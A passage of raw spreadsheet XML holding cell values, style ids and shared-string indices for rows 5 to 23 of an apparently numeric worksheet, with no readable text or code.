        <v>75873.0</v>
      </c>
      <c r="AD5" s="5"/>
      <c r="AE5" s="14"/>
      <c r="AF5" s="14"/>
    </row>
    <row r="6">
      <c r="A6" s="6">
        <f t="shared" si="1"/>
        <v>0.7006333872</v>
      </c>
      <c r="B6" s="29">
        <v>1.0</v>
      </c>
      <c r="C6" s="15"/>
      <c r="D6" s="14"/>
      <c r="E6" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F6" s="14"/>
      <c r="G6" s="29">
        <v>1.0</v>
      </c>
      <c r="H6" s="29">
        <v>93.0</v>
      </c>
      <c r="I6" s="29">
        <v>173362.0</v>
      </c>
      <c r="J6" s="15"/>
      <c r="K6" s="29">
        <v>6253.0</v>
      </c>
      <c r="L6" s="15"/>
      <c r="M6" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N6" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O6" s="29">
        <v>0.0</v>
      </c>
      <c r="P6" s="29">
        <v>3.0</v>
      </c>
      <c r="Q6" s="15"/>
      <c r="R6" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S6" s="15"/>
      <c r="T6" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U6" s="5" t="s">
        <v>74</v>
      </c>
      <c r="V6" s="5" t="s">
        <v>74</v>
      </c>
      <c r="W6" s="18" t="s">
        <v>66</v>
      </c>
      <c r="X6" s="18" t="s">
        <v>75</v>
      </c>
      <c r="Y6" s="18" t="s">
        <v>1084</v>
      </c>
      <c r="Z6" s="38" t="s">
        <v>1085</v>
      </c>
      <c r="AA6" s="39" t="s">
        <v>1086</v>
      </c>
      <c r="AB6" s="38" t="s">
        <v>1087</v>
      </c>
      <c r="AC6" s="40">
        <v>181862.0</v>
      </c>
      <c r="AD6" s="5"/>
      <c r="AE6" s="14"/>
      <c r="AF6" s="14"/>
    </row>
    <row r="7">
      <c r="A7" s="6">
        <f t="shared" si="1"/>
        <v>0.6795003059</v>
      </c>
      <c r="B7" s="29">
        <v>1.0</v>
      </c>
      <c r="C7" s="29">
        <v>96953.0</v>
      </c>
      <c r="D7" s="14"/>
      <c r="E7" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F7" s="14"/>
      <c r="G7" s="29">
        <v>45.0</v>
      </c>
      <c r="H7" s="29">
        <v>124408.0</v>
      </c>
      <c r="I7" s="29">
        <v>2379.0</v>
      </c>
      <c r="J7" s="5" t="s">
        <v>1088</v>
      </c>
      <c r="K7" s="29">
        <v>-1.0</v>
      </c>
      <c r="L7" s="15"/>
      <c r="M7" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N7" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O7" s="29">
        <v>3.0</v>
      </c>
      <c r="P7" s="29">
        <v>4.0</v>
      </c>
      <c r="Q7" s="15"/>
      <c r="R7" s="15"/>
      <c r="S7" s="15"/>
      <c r="T7" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U7" s="5" t="s">
        <v>74</v>
      </c>
      <c r="V7" s="5" t="s">
        <v>74</v>
      </c>
      <c r="W7" s="41" t="s">
        <v>185</v>
      </c>
      <c r="X7" s="18" t="s">
        <v>1089</v>
      </c>
      <c r="Y7" s="18" t="s">
        <v>74</v>
      </c>
      <c r="Z7" s="38" t="s">
        <v>1090</v>
      </c>
      <c r="AA7" s="39" t="s">
        <v>1091</v>
      </c>
      <c r="AB7" s="38" t="s">
        <v>1092</v>
      </c>
      <c r="AC7" s="40">
        <v>3848.0</v>
      </c>
      <c r="AD7" s="5"/>
      <c r="AE7" s="14"/>
      <c r="AF7" s="14"/>
    </row>
    <row r="8">
      <c r="A8" s="6">
        <f t="shared" si="1"/>
        <v>0.2772323867</v>
      </c>
      <c r="B8" s="29">
        <v>1.0</v>
      </c>
      <c r="C8" s="29">
        <v>242403.0</v>
      </c>
      <c r="D8" s="14"/>
      <c r="E8" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F8" s="14"/>
      <c r="G8" s="29">
        <v>1.0</v>
      </c>
      <c r="H8" s="29">
        <v>1870.0</v>
      </c>
      <c r="I8" s="29">
        <v>82452.0</v>
      </c>
      <c r="J8" s="15"/>
      <c r="K8" s="29">
        <v>82452.0</v>
      </c>
      <c r="L8" s="15"/>
      <c r="M8" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N8" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O8" s="29">
        <v>1.0</v>
      </c>
      <c r="P8" s="29">
        <v>0.0</v>
      </c>
      <c r="Q8" s="15"/>
      <c r="R8" s="15"/>
      <c r="S8" s="15"/>
      <c r="T8" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U8" s="5" t="s">
        <v>75</v>
      </c>
      <c r="V8" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W8" s="37" t="s">
        <v>75</v>
      </c>
      <c r="X8" s="37" t="s">
        <v>75</v>
      </c>
      <c r="Y8" s="37" t="s">
        <v>1093</v>
      </c>
      <c r="Z8" s="38" t="s">
        <v>1094</v>
      </c>
      <c r="AA8" s="39" t="s">
        <v>1095</v>
      </c>
      <c r="AB8" s="38" t="s">
        <v>1096</v>
      </c>
      <c r="AC8" s="40">
        <v>242104.0</v>
      </c>
      <c r="AD8" s="5"/>
      <c r="AE8" s="14"/>
      <c r="AF8" s="14"/>
    </row>
    <row r="9">
      <c r="A9" s="6">
        <f t="shared" si="1"/>
        <v>0.442122851</v>
      </c>
      <c r="B9" s="29">
        <v>1.0</v>
      </c>
      <c r="C9" s="29">
        <v>229601.0</v>
      </c>
      <c r="D9" s="14"/>
      <c r="E9" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F9" s="14"/>
      <c r="G9" s="29">
        <v>0.0</v>
      </c>
      <c r="H9" s="29">
        <v>96.0</v>
      </c>
      <c r="I9" s="29">
        <v>177686.0</v>
      </c>
      <c r="J9" s="15"/>
      <c r="K9" s="15"/>
      <c r="L9" s="15"/>
      <c r="M9" s="15"/>
      <c r="N9" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O9" s="29">
        <v>1.0</v>
      </c>
      <c r="P9" s="29">
        <v>0.0</v>
      </c>
      <c r="Q9" s="15"/>
      <c r="R9" s="15"/>
      <c r="S9" s="15"/>
      <c r="T9" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U9" s="5" t="s">
        <v>75</v>
      </c>
      <c r="V9" s="5" t="s">
        <v>75</v>
      </c>
      <c r="W9" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X9" s="37" t="s">
        <v>61</v>
      </c>
      <c r="Y9" s="37" t="s">
        <v>1097</v>
      </c>
      <c r="Z9" s="38" t="s">
        <v>1098</v>
      </c>
      <c r="AA9" s="39" t="s">
        <v>1099</v>
      </c>
      <c r="AB9" s="38" t="s">
        <v>1100</v>
      </c>
      <c r="AC9" s="40">
        <v>229551.0</v>
      </c>
      <c r="AD9" s="5"/>
      <c r="AE9" s="14"/>
      <c r="AF9" s="14"/>
    </row>
    <row r="10">
      <c r="A10" s="6">
        <f t="shared" si="1"/>
        <v>0.2844976127</v>
      </c>
      <c r="B10" s="29">
        <v>1.0</v>
      </c>
      <c r="C10" s="29">
        <v>87101.0</v>
      </c>
      <c r="D10" s="14"/>
      <c r="E10" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F10" s="14"/>
      <c r="G10" s="29">
        <v>5.0</v>
      </c>
      <c r="H10" s="29">
        <v>40154.0</v>
      </c>
      <c r="I10" s="29">
        <v>21323.0</v>
      </c>
      <c r="J10" s="15"/>
      <c r="K10" s="15"/>
      <c r="L10" s="15"/>
      <c r="M10" s="15"/>
      <c r="N10" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O10" s="29">
        <v>4.0</v>
      </c>
      <c r="P10" s="29">
        <v>4.0</v>
      </c>
      <c r="Q10" s="15"/>
      <c r="R10" s="15"/>
      <c r="S10" s="15"/>
      <c r="T10" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U10" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V10" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W10" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="X10" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="Y10" s="37" t="s">
        <v>1102</v>
      </c>
      <c r="Z10" s="38" t="s">
        <v>1103</v>
      </c>
      <c r="AA10" s="39" t="s">
        <v>1104</v>
      </c>
      <c r="AB10" s="38" t="s">
        <v>1105</v>
      </c>
      <c r="AC10" s="40">
        <v>82902.0</v>
      </c>
      <c r="AD10" s="5"/>
      <c r="AE10" s="14"/>
      <c r="AF10" s="14"/>
    </row>
    <row r="11">
      <c r="A11" s="6">
        <f t="shared" si="1"/>
        <v>0.8285867179</v>
      </c>
      <c r="B11" s="29">
        <v>1.0</v>
      </c>
      <c r="C11" s="14"/>
      <c r="D11" s="14"/>
      <c r="E11" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F11" s="14"/>
      <c r="G11" s="29">
        <v>21.0</v>
      </c>
      <c r="H11" s="29">
        <v>8781.0</v>
      </c>
      <c r="I11" s="29">
        <v>52239.0</v>
      </c>
      <c r="J11" s="15"/>
      <c r="K11" s="29">
        <v>52239.0</v>
      </c>
      <c r="L11" s="15"/>
      <c r="M11" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N11" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O11" s="29">
        <v>5.0</v>
      </c>
      <c r="P11" s="29">
        <v>11.0</v>
      </c>
      <c r="Q11" s="15"/>
      <c r="R11" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S11" s="15"/>
      <c r="T11" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U11" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V11" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W11" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="X11" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="Y11" s="37" t="s">
        <v>1106</v>
      </c>
      <c r="Z11" s="38" t="s">
        <v>1107</v>
      </c>
      <c r="AA11" s="39" t="s">
        <v>1108</v>
      </c>
      <c r="AB11" s="38" t="s">
        <v>1109</v>
      </c>
      <c r="AC11" s="40">
        <v>143781.0</v>
      </c>
      <c r="AD11" s="5"/>
      <c r="AE11" s="14"/>
      <c r="AF11" s="14"/>
    </row>
    <row r="12">
      <c r="A12" s="6">
        <f t="shared" si="1"/>
        <v>0.8534937647</v>
      </c>
      <c r="B12" s="29">
        <v>1.0</v>
      </c>
      <c r="C12" s="15"/>
      <c r="D12" s="14"/>
      <c r="E12" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F12" s="14"/>
      <c r="G12" s="29">
        <v>3.0</v>
      </c>
      <c r="H12" s="29">
        <v>2714.0</v>
      </c>
      <c r="I12" s="29">
        <v>13979.0</v>
      </c>
      <c r="J12" s="15"/>
      <c r="K12" s="15"/>
      <c r="L12" s="15"/>
      <c r="M12" s="15"/>
      <c r="N12" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O12" s="29">
        <v>3.0</v>
      </c>
      <c r="P12" s="29">
        <v>4.0</v>
      </c>
      <c r="Q12" s="15"/>
      <c r="R12" s="15"/>
      <c r="S12" s="15"/>
      <c r="T12" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U12" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V12" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W12" s="41" t="s">
        <v>1101</v>
      </c>
      <c r="X12" s="18" t="s">
        <v>1101</v>
      </c>
      <c r="Y12" s="18" t="s">
        <v>1106</v>
      </c>
      <c r="Z12" s="38" t="s">
        <v>1110</v>
      </c>
      <c r="AA12" s="39" t="s">
        <v>1111</v>
      </c>
      <c r="AB12" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC12" s="40">
        <v>21527.0</v>
      </c>
      <c r="AD12" s="5"/>
      <c r="AE12" s="14"/>
      <c r="AF12" s="14"/>
    </row>
    <row r="13">
      <c r="A13" s="6">
        <f t="shared" si="1"/>
        <v>0.7831521519</v>
      </c>
      <c r="B13" s="29">
        <v>1.0</v>
      </c>
      <c r="C13" s="29">
        <v>186536.0</v>
      </c>
      <c r="D13" s="14"/>
      <c r="E13" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F13" s="14"/>
      <c r="G13" s="29">
        <v>1.0</v>
      </c>
      <c r="H13" s="29">
        <v>13487.0</v>
      </c>
      <c r="I13" s="29">
        <v>178974.0</v>
      </c>
      <c r="J13" s="15"/>
      <c r="K13" s="29">
        <v>178974.0</v>
      </c>
      <c r="L13" s="15"/>
      <c r="M13" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N13" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O13" s="29">
        <v>1.0</v>
      </c>
      <c r="P13" s="29">
        <v>0.0</v>
      </c>
      <c r="Q13" s="15"/>
      <c r="R13" s="15"/>
      <c r="S13" s="15"/>
      <c r="T13" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U13" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V13" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W13" s="41" t="s">
        <v>1101</v>
      </c>
      <c r="X13" s="41" t="s">
        <v>1101</v>
      </c>
      <c r="Y13" s="18" t="s">
        <v>1106</v>
      </c>
      <c r="Z13" s="38" t="s">
        <v>1112</v>
      </c>
      <c r="AA13" s="39" t="s">
        <v>1113</v>
      </c>
      <c r="AB13" s="38" t="s">
        <v>1114</v>
      </c>
      <c r="AC13" s="40">
        <v>186535.0</v>
      </c>
      <c r="AD13" s="5"/>
      <c r="AE13" s="14"/>
      <c r="AF13" s="14"/>
    </row>
    <row r="14">
      <c r="A14" s="6">
        <f t="shared" si="1"/>
        <v>0.1942682409</v>
      </c>
      <c r="B14" s="29">
        <v>1.0</v>
      </c>
      <c r="C14" s="15"/>
      <c r="D14" s="14"/>
      <c r="E14" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F14" s="14"/>
      <c r="G14" s="29">
        <v>3.0</v>
      </c>
      <c r="H14" s="29">
        <v>9698.0</v>
      </c>
      <c r="I14" s="29">
        <v>67046.0</v>
      </c>
      <c r="J14" s="15"/>
      <c r="K14" s="29">
        <v>-1.0</v>
      </c>
      <c r="L14" s="15"/>
      <c r="M14" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N14" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O14" s="29">
        <v>5.0</v>
      </c>
      <c r="P14" s="29">
        <v>1.0</v>
      </c>
      <c r="Q14" s="15"/>
      <c r="R14" s="15"/>
      <c r="S14" s="15"/>
      <c r="T14" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U14" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V14" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W14" s="41" t="s">
        <v>1101</v>
      </c>
      <c r="X14" s="18" t="s">
        <v>1101</v>
      </c>
      <c r="Y14" s="18" t="s">
        <v>1106</v>
      </c>
      <c r="Z14" s="38" t="s">
        <v>1115</v>
      </c>
      <c r="AA14" s="39" t="s">
        <v>1116</v>
      </c>
      <c r="AB14" s="38" t="s">
        <v>1117</v>
      </c>
      <c r="AC14" s="40">
        <v>142473.0</v>
      </c>
      <c r="AD14" s="5"/>
      <c r="AE14" s="14"/>
      <c r="AF14" s="14"/>
    </row>
    <row r="15">
      <c r="A15" s="6">
        <f t="shared" si="1"/>
        <v>0.1350901947</v>
      </c>
      <c r="B15" s="29">
        <v>1.0</v>
      </c>
      <c r="C15" s="15"/>
      <c r="D15" s="14"/>
      <c r="E15" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F15" s="14"/>
      <c r="G15" s="29">
        <v>2.0</v>
      </c>
      <c r="H15" s="29">
        <v>424.0</v>
      </c>
      <c r="I15" s="29">
        <v>396.0</v>
      </c>
      <c r="J15" s="15"/>
      <c r="K15" s="29">
        <v>396.0</v>
      </c>
      <c r="L15" s="15"/>
      <c r="M15" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N15" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O15" s="29">
        <v>2.0</v>
      </c>
      <c r="P15" s="29">
        <v>5.0</v>
      </c>
      <c r="Q15" s="15"/>
      <c r="R15" s="15"/>
      <c r="S15" s="15"/>
      <c r="T15" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U15" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V15" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W15" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X15" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="Y15" s="37" t="s">
        <v>1118</v>
      </c>
      <c r="Z15" s="38" t="s">
        <v>1119</v>
      </c>
      <c r="AA15" s="39" t="s">
        <v>1120</v>
      </c>
      <c r="AB15" s="38" t="s">
        <v>1121</v>
      </c>
      <c r="AC15" s="40">
        <v>24655.0</v>
      </c>
      <c r="AD15" s="5"/>
      <c r="AE15" s="14"/>
      <c r="AF15" s="14"/>
    </row>
    <row r="16">
      <c r="A16" s="6">
        <f t="shared" si="1"/>
        <v>0.0748470353</v>
      </c>
      <c r="B16" s="29">
        <v>1.0</v>
      </c>
      <c r="C16" s="14"/>
      <c r="D16" s="14"/>
      <c r="E16" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F16" s="14"/>
      <c r="G16" s="29">
        <v>4.0</v>
      </c>
      <c r="H16" s="29">
        <v>834.0</v>
      </c>
      <c r="I16" s="29">
        <v>130388.0</v>
      </c>
      <c r="J16" s="15"/>
      <c r="K16" s="15"/>
      <c r="L16" s="15"/>
      <c r="M16" s="14"/>
      <c r="N16" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O16" s="29">
        <v>2.0</v>
      </c>
      <c r="P16" s="29">
        <v>0.0</v>
      </c>
      <c r="Q16" s="15"/>
      <c r="R16" s="15"/>
      <c r="S16" s="15"/>
      <c r="T16" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U16" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V16" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W16" s="37" t="s">
        <v>1122</v>
      </c>
      <c r="X16" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="Y16" s="37" t="s">
        <v>1106</v>
      </c>
      <c r="Z16" s="38" t="s">
        <v>1123</v>
      </c>
      <c r="AA16" s="39" t="s">
        <v>1124</v>
      </c>
      <c r="AB16" s="38" t="s">
        <v>1125</v>
      </c>
      <c r="AC16" s="40">
        <v>142517.0</v>
      </c>
      <c r="AD16" s="5"/>
      <c r="AE16" s="14"/>
      <c r="AF16" s="14"/>
    </row>
    <row r="17">
      <c r="A17" s="6">
        <f t="shared" si="1"/>
        <v>0.1125875247</v>
      </c>
      <c r="B17" s="29">
        <v>1.0</v>
      </c>
      <c r="C17" s="14"/>
      <c r="D17" s="14"/>
      <c r="E17" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F17" s="14"/>
      <c r="G17" s="29">
        <v>1.0</v>
      </c>
      <c r="H17" s="29">
        <v>107.0</v>
      </c>
      <c r="I17" s="29">
        <v>221002.0</v>
      </c>
      <c r="J17" s="15"/>
      <c r="K17" s="29">
        <v>221002.0</v>
      </c>
      <c r="L17" s="15"/>
      <c r="M17" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N17" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O17" s="29">
        <v>0.0</v>
      </c>
      <c r="P17" s="29">
        <v>2.0</v>
      </c>
      <c r="Q17" s="15"/>
      <c r="R17" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S17" s="15"/>
      <c r="T17" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U17" s="5" t="s">
        <v>1101</v>
      </c>
      <c r="V17" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W17" s="41" t="s">
        <v>61</v>
      </c>
      <c r="X17" s="18" t="s">
        <v>1101</v>
      </c>
      <c r="Y17" s="18" t="s">
        <v>1126</v>
      </c>
      <c r="Z17" s="38" t="s">
        <v>1127</v>
      </c>
      <c r="AA17" s="39" t="s">
        <v>1128</v>
      </c>
      <c r="AB17" s="38" t="s">
        <v>1129</v>
      </c>
      <c r="AC17" s="40">
        <v>220627.0</v>
      </c>
      <c r="AD17" s="5"/>
      <c r="AE17" s="14"/>
      <c r="AF17" s="14"/>
    </row>
    <row r="18">
      <c r="A18" s="6">
        <f t="shared" si="1"/>
        <v>0.3524430762</v>
      </c>
      <c r="B18" s="29">
        <v>1.0</v>
      </c>
      <c r="C18" s="14"/>
      <c r="D18" s="14"/>
      <c r="E18" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F18" s="14"/>
      <c r="G18" s="29">
        <v>2.0</v>
      </c>
      <c r="H18" s="29">
        <v>2524.0</v>
      </c>
      <c r="I18" s="29">
        <v>15396.0</v>
      </c>
      <c r="J18" s="15"/>
      <c r="K18" s="29">
        <v>15396.0</v>
      </c>
      <c r="L18" s="15"/>
      <c r="M18" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N18" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O18" s="29">
        <v>1.0</v>
      </c>
      <c r="P18" s="29">
        <v>2.0</v>
      </c>
      <c r="Q18" s="15"/>
      <c r="R18" s="15"/>
      <c r="S18" s="15"/>
      <c r="T18" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U18" s="5" t="s">
        <v>177</v>
      </c>
      <c r="V18" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W18" s="37" t="s">
        <v>245</v>
      </c>
      <c r="X18" s="37" t="s">
        <v>177</v>
      </c>
      <c r="Y18" s="37" t="s">
        <v>178</v>
      </c>
      <c r="Z18" s="38" t="s">
        <v>1130</v>
      </c>
      <c r="AA18" s="39" t="s">
        <v>1131</v>
      </c>
      <c r="AB18" s="38" t="s">
        <v>1132</v>
      </c>
      <c r="AC18" s="40">
        <v>23134.0</v>
      </c>
      <c r="AD18" s="5"/>
      <c r="AE18" s="14"/>
      <c r="AF18" s="14"/>
    </row>
    <row r="19">
      <c r="A19" s="6">
        <f t="shared" si="1"/>
        <v>0.34700933</v>
      </c>
      <c r="B19" s="29">
        <v>1.0</v>
      </c>
      <c r="C19" s="29">
        <v>1725.0</v>
      </c>
      <c r="D19" s="14"/>
      <c r="E19" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F19" s="14"/>
      <c r="G19" s="29">
        <v>7.0</v>
      </c>
      <c r="H19" s="29">
        <v>967.0</v>
      </c>
      <c r="I19" s="29">
        <v>1133.0</v>
      </c>
      <c r="J19" s="15"/>
      <c r="K19" s="29">
        <v>1133.0</v>
      </c>
      <c r="L19" s="15"/>
      <c r="M19" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N19" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O19" s="29">
        <v>8.0</v>
      </c>
      <c r="P19" s="29">
        <v>6.0</v>
      </c>
      <c r="Q19" s="15"/>
      <c r="R19" s="15"/>
      <c r="S19" s="15"/>
      <c r="T19" s="5" t="s">
        <v>51</v>
      </c>
      <c r="U19" s="5" t="s">
        <v>177</v>
      </c>
      <c r="V19" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W19" s="41" t="s">
        <v>245</v>
      </c>
      <c r="X19" s="18" t="s">
        <v>177</v>
      </c>
      <c r="Y19" s="18" t="s">
        <v>1133</v>
      </c>
      <c r="Z19" s="38" t="s">
        <v>1134</v>
      </c>
      <c r="AA19" s="39" t="s">
        <v>1135</v>
      </c>
      <c r="AB19" s="38" t="s">
        <v>1136</v>
      </c>
      <c r="AC19" s="40">
        <v>1724.0</v>
      </c>
      <c r="AD19" s="5"/>
      <c r="AE19" s="14"/>
      <c r="AF19" s="14"/>
    </row>
    <row r="20">
      <c r="A20" s="6">
        <f t="shared" si="1"/>
        <v>0.4021932598</v>
      </c>
      <c r="B20" s="29">
        <v>1.0</v>
      </c>
      <c r="C20" s="29">
        <v>44372.0</v>
      </c>
      <c r="D20" s="14"/>
      <c r="E20" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F20" s="14"/>
      <c r="G20" s="29">
        <v>4.0</v>
      </c>
      <c r="H20" s="29">
        <v>818.0</v>
      </c>
      <c r="I20" s="15"/>
      <c r="J20" s="5" t="s">
        <v>1137</v>
      </c>
      <c r="K20" s="29">
        <v>-1.0</v>
      </c>
      <c r="L20" s="15"/>
      <c r="M20" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N20" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O20" s="29">
        <v>1.0</v>
      </c>
      <c r="P20" s="29">
        <v>0.0</v>
      </c>
      <c r="Q20" s="15"/>
      <c r="R20" s="15"/>
      <c r="S20" s="15"/>
      <c r="T20" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U20" s="5" t="s">
        <v>1079</v>
      </c>
      <c r="V20" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W20" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="X20" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="Y20" s="37" t="s">
        <v>1138</v>
      </c>
      <c r="Z20" s="38" t="s">
        <v>1139</v>
      </c>
      <c r="AA20" s="39" t="s">
        <v>1140</v>
      </c>
      <c r="AB20" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC20" s="40">
        <v>44371.0</v>
      </c>
      <c r="AD20" s="5"/>
      <c r="AE20" s="14"/>
      <c r="AF20" s="14"/>
    </row>
    <row r="21">
      <c r="A21" s="6">
        <f t="shared" si="1"/>
        <v>0.6351174439</v>
      </c>
      <c r="B21" s="29">
        <v>1.0</v>
      </c>
      <c r="C21" s="15"/>
      <c r="D21" s="14"/>
      <c r="E21" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F21" s="14"/>
      <c r="G21" s="29">
        <v>0.0</v>
      </c>
      <c r="H21" s="29">
        <v>153.0</v>
      </c>
      <c r="I21" s="29">
        <v>177013.0</v>
      </c>
      <c r="J21" s="15"/>
      <c r="K21" s="29">
        <v>177013.0</v>
      </c>
      <c r="L21" s="15"/>
      <c r="M21" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N21" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O21" s="29">
        <v>1.0</v>
      </c>
      <c r="P21" s="29">
        <v>0.0</v>
      </c>
      <c r="Q21" s="15"/>
      <c r="R21" s="15"/>
      <c r="S21" s="15"/>
      <c r="T21" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U21" s="5" t="s">
        <v>1079</v>
      </c>
      <c r="V21" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W21" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="X21" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="Y21" s="37" t="s">
        <v>1141</v>
      </c>
      <c r="Z21" s="38" t="s">
        <v>1142</v>
      </c>
      <c r="AA21" s="39" t="s">
        <v>1143</v>
      </c>
      <c r="AB21" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC21" s="40">
        <v>263975.0</v>
      </c>
      <c r="AD21" s="5"/>
      <c r="AE21" s="14"/>
      <c r="AF21" s="14"/>
    </row>
    <row r="22">
      <c r="A22" s="6">
        <f t="shared" si="1"/>
        <v>0.09059383013</v>
      </c>
      <c r="B22" s="29">
        <v>1.0</v>
      </c>
      <c r="C22" s="29">
        <v>242447.0</v>
      </c>
      <c r="D22" s="14"/>
      <c r="E22" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F22" s="14"/>
      <c r="G22" s="29">
        <v>0.0</v>
      </c>
      <c r="H22" s="29">
        <v>1112.0</v>
      </c>
      <c r="I22" s="29">
        <v>246794.0</v>
      </c>
      <c r="J22" s="15"/>
      <c r="K22" s="15"/>
      <c r="L22" s="15"/>
      <c r="M22" s="15"/>
      <c r="N22" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O22" s="29">
        <v>2.0</v>
      </c>
      <c r="P22" s="29">
        <v>6.0</v>
      </c>
      <c r="Q22" s="15"/>
      <c r="R22" s="15"/>
      <c r="S22" s="15"/>
      <c r="T22" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U22" s="5" t="s">
        <v>1079</v>
      </c>
      <c r="V22" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W22" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="X22" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="Y22" s="37" t="s">
        <v>1144</v>
      </c>
      <c r="Z22" s="38" t="s">
        <v>1145</v>
      </c>
      <c r="AA22" s="39" t="s">
        <v>1146</v>
      </c>
      <c r="AB22" s="38" t="s">
        <v>1147</v>
      </c>
      <c r="AC22" s="40">
        <v>241713.0</v>
      </c>
      <c r="AD22" s="5"/>
      <c r="AE22" s="14"/>
      <c r="AF22" s="14"/>
    </row>
    <row r="23">
      <c r="A23" s="6">
        <f t="shared" si="1"/>
        <v>0.6655657323</v>
      </c>
      <c r="B23" s="29">
        <v>1.0</v>
      </c>
      <c r="C23" s="29">
        <v>32604.0</v>
      </c>
      <c r="D23" s="14"/>
      <c r="E23" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F23" s="14"/>
      <c r="G23" s="29">
        <v>3.0</v>
      </c>
      <c r="H23" s="29">
        <v>7076.0</v>
      </c>
      <c r="I23" s="29">
        <v>10158.0</v>
      </c>
      <c r="J23" s="15"/>
      <c r="K23" s="29">
        <v>135930.0</v>
      </c>
      <c r="L23" s="15"/>
      <c r="M23" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N23" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O23" s="29">
        <v>3.0</v>
      </c>
      <c r="P23" s="29">
        <v>1.0</v>
      </c>
      <c r="Q23" s="15"/>
      <c r="R23" s="15"/>
      <c r="S23" s="15"/>
